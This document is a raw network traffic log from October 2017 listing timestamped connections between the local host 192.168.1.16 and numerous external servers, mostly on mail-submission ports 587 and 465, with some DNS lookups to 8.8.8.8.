Okt 17, 2017 21:54:33.352061033 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.352075100 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.352277040 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.352299929 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.352420092 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.352442980 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.367542982 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:33.367571115 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.369003057 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.369030952 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.369524956 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.369545937 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.385966063 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.386223078 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.386254072 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.386399984 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.386420012 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.394232035 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.394844055 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.394862890 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.395457029 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.395473957 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.499847889 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.500039101 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.500057936 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.506048918 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.506063938 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.514415026 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.514596939 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.514615059 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.517353058 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:33.517368078 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:33.534218073 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:33.565532923 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:33.565649033 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:33.568476915 MESZ58749214213.186.33.20192.168.1.16
Okt 17, 2017 21:54:33.569072962 MESZ49214587192.168.1.16213.186.33.20
Okt 17, 2017 21:54:33.579193115 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:33.579526901 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:33.579545975 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:33.584983110 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:33.585001945 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:33.644803047 MESZ353549202173.201.192.101192.168.1.16
Okt 17, 2017 21:54:33.645740986 MESZ492023535192.168.1.16173.201.192.101
Okt 17, 2017 21:54:33.645850897 MESZ353549202173.201.192.101192.168.1.16
Okt 17, 2017 21:54:33.646337032 MESZ492023535192.168.1.16173.201.192.101
Okt 17, 2017 21:54:33.649516106 MESZ6440553192.168.1.168.8.8.8
Okt 17, 2017 21:54:33.653670073 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.658139944 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.658158064 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.658641100 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.658657074 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.670172930 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.670914888 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:33.670931101 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.671689034 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:33.671705961 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.688095093 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.688294888 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.688314915 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.692929029 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.692946911 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.695214033 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.696039915 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.696058989 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.696633101 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.696654081 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.702311993 MESZ443491955.196.73.150192.168.1.16
Okt 17, 2017 21:54:33.702588081 MESZ49195443192.168.1.165.196.73.150
Okt 17, 2017 21:54:33.869497061 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:33.884783030 MESZ53644058.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.884926081 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.886102915 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.886136055 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.886223078 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.886898041 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:33.886914968 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.887311935 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:33.887325048 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:33.917815924 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.917860031 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.917994022 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.925031900 MESZ49213587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.925052881 MESZ58749213212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.929403067 MESZ5221653192.168.1.168.8.8.8
Okt 17, 2017 21:54:33.936779976 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.937364101 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.937381029 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.937804937 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:33.937820911 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:33.997337103 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.997970104 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.997989893 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:33.998414993 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:33.998430014 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.076483965 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.076895952 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.077043056 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.077060938 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.077322006 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.077337980 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.087680101 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.088936090 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.088973045 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.089131117 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.089153051 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.131716967 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:34.132241011 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:34.132263899 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:34.132369995 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:34.132385015 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:34.182118893 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.182229996 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.184566021 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.192826033 MESZ49217587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.192857027 MESZ58749217212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.196103096 MESZ5062153192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.282165051 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.282551050 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.282588005 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.282752037 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.282773972 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.292162895 MESZ53522168.8.8.8192.168.1.16
Okt 17, 2017 21:54:34.293524981 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:34.293576956 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:34.293680906 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:34.315757036 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.316756010 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.316792965 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.317125082 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.317150116 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.458288908 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.458643913 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:34.458674908 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.458846092 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:34.458868027 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.535096884 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.535470009 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.535501003 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.535674095 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.535695076 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.542144060 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.542181969 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.542310953 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.553910017 MESZ49218587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:34.553930044 MESZ58749218212.77.101.1192.168.1.16
Okt 17, 2017 21:54:34.556976080 MESZ5463953192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.587651968 MESZ53506218.8.8.8192.168.1.16
Okt 17, 2017 21:54:34.587735891 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:34.589037895 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.589088917 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.589195013 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.589766026 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.589797020 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.601247072 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:34.601352930 MESZ58749215195.78.67.24192.168.1.16
Okt 17, 2017 21:54:34.601454973 MESZ49215587192.168.1.16195.78.67.24
Okt 17, 2017 21:54:34.604156017 MESZ6054353192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.624663115 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:34.626480103 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:34.626501083 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:34.626650095 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:34.626665115 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:34.753422022 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.753446102 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.753453970 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.753559113 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.786307096 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.786338091 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.786613941 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.786634922 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.786772966 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.786830902 MESZ46549216213.180.147.145192.168.1.16
Okt 17, 2017 21:54:34.786931038 MESZ49216465192.168.1.16213.180.147.145
Okt 17, 2017 21:54:34.793196917 MESZ5194553192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.851275921 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:34.851603985 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:34.851629019 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:34.851787090 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:34.851845980 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:34.851916075 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:34.855987072 MESZ5204653192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.866101027 MESZ53546398.8.8.8192.168.1.16
Okt 17, 2017 21:54:34.867027044 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:34.867058992 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:34.867528915 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:34.867857933 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:34.867878914 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:34.884826899 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.885133982 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:34.885158062 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.885303020 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:34.885320902 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:34.988487005 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:34.988627911 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.994867086 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:34.994888067 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:35.052781105 MESZ53605438.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.054302931 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.054352045 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.054459095 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.054970026 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.055001974 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.147705078 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:35.148221016 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:35.148245096 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:35.148667097 MESZ49220465192.168.1.16195.4.92.210
Okt 17, 2017 21:54:35.148682117 MESZ46549220195.4.92.210192.168.1.16
Okt 17, 2017 21:54:35.178107977 MESZ53519458.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.179405928 MESZ49224587192.168.1.1681.169.145.164
Okt 17, 2017 21:54:35.179456949 MESZ5874922481.169.145.164192.168.1.16
Okt 17, 2017 21:54:35.179563999 MESZ49224587192.168.1.1681.169.145.164
Okt 17, 2017 21:54:35.187689066 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.188785076 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.188824892 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.188996077 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.189019918 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.189956903 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.189979076 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.190201044 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.190224886 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.190498114 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.190521955 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.283693075 MESZ5874922481.169.145.164192.168.1.16
Okt 17, 2017 21:54:35.283888102 MESZ49224587192.168.1.1681.169.145.164
Okt 17, 2017 21:54:35.284001112 MESZ49224587192.168.1.1681.169.145.164
Okt 17, 2017 21:54:35.284029961 MESZ5874922481.169.145.164192.168.1.16
Okt 17, 2017 21:54:35.289917946 MESZ6295153192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.342417002 MESZ53520468.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.343899012 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:35.343949080 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:35.344058990 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:35.344625950 MESZ49225465192.168.1.1682.207.178.23
Okt 17, 2017 21:54:35.344657898 MESZ4654922582.207.178.23192.168.1.16
Okt 17, 2017 21:54:35.345572948 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.359126091 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.359345913 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.359383106 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.379939079 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.380160093 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.380196095 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.392209053 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.392249107 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.408546925 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.408569098 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.408746004 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.431086063 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.462625980 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.462793112 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.462832928 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.486908913 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.486932039 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.491586924 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.491859913 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.491883039 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.491991043 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.492052078 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.492496967 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.494941950 MESZ4937953192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.615745068 MESZ53629518.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.615823984 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:54:35.616835117 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:35.616862059 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:35.617932081 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:35.619981050 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.620249987 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.620266914 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.620469093 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:35.620482922 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:35.676589012 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.771605015 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.772584915 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.772614002 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.772847891 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.772907972 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:35.773025990 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:35.777390957 MESZ5500653192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.811062098 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:54:35.881119013 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.881150961 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.882648945 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.882678032 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.883207083 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:35.883235931 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:35.887656927 MESZ53493798.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.888976097 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:35.889012098 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:35.889378071 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:35.889691114 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:35.889712095 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:36.102555990 MESZ53550068.8.8.8192.168.1.16
Okt 17, 2017 21:54:36.104168892 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:36.104243994 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:36.104350090 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:36.686714888 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.688452959 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:36.688488960 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.688676119 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:36.688699961 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.770704985 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:36.771096945 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:36.771133900 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:36.771708965 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:36.771735907 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:36.791909933 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.792385101 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:36.792423010 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.792687893 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:36.792714119 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.793277025 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:36.795150042 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:36.795187950 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:36.795345068 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:36.795366049 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:36.799123049 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:36.799144983 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:36.799154043 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:36.799351931 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:36.824042082 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:36.867649078 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:36.868474960 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:36.868583918 MESZ58749219195.4.92.211192.168.1.16
Okt 17, 2017 21:54:36.872498989 MESZ49219587192.168.1.16195.4.92.211
Okt 17, 2017 21:54:36.876199961 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.876939058 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:36.876955986 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.880494118 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:36.880508900 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:36.915501118 MESZ5978453192.168.1.168.8.8.8
Okt 17, 2017 21:54:36.928649902 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.928864002 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:36.928884029 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.932493925 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:36.932509899 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:36.971318960 MESZ49229465192.168.1.1685.124.51.105
Okt 17, 2017 21:54:36.971338034 MESZ4654922985.124.51.105192.168.1.16
Okt 17, 2017 21:54:37.028309107 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.028928995 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.028956890 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.029069901 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:37.029086113 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:37.115751982 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.116765976 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.116789103 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.117343903 MESZ49230587192.168.1.1691.198.169.21
Okt 17, 2017 21:54:37.117363930 MESZ5874923091.198.169.21192.168.1.16
Okt 17, 2017 21:54:37.124115944 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:37.124556065 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:37.124574900 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:37.128514051 MESZ49227587192.168.1.1685.13.152.217
Okt 17, 2017 21:54:37.128531933 MESZ5874922785.13.152.217192.168.1.16
Okt 17, 2017 21:54:37.160491943 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:37.160717964 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:37.160742044 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:37.160877943 MESZ49221465192.168.1.1684.255.208.30
Okt 17, 2017 21:54:37.160933018 MESZ4654922184.255.208.30192.168.1.16
Okt 17, 2017 21:54:37.162236929 MESZ49221465192.168.1.1684.255.208.30
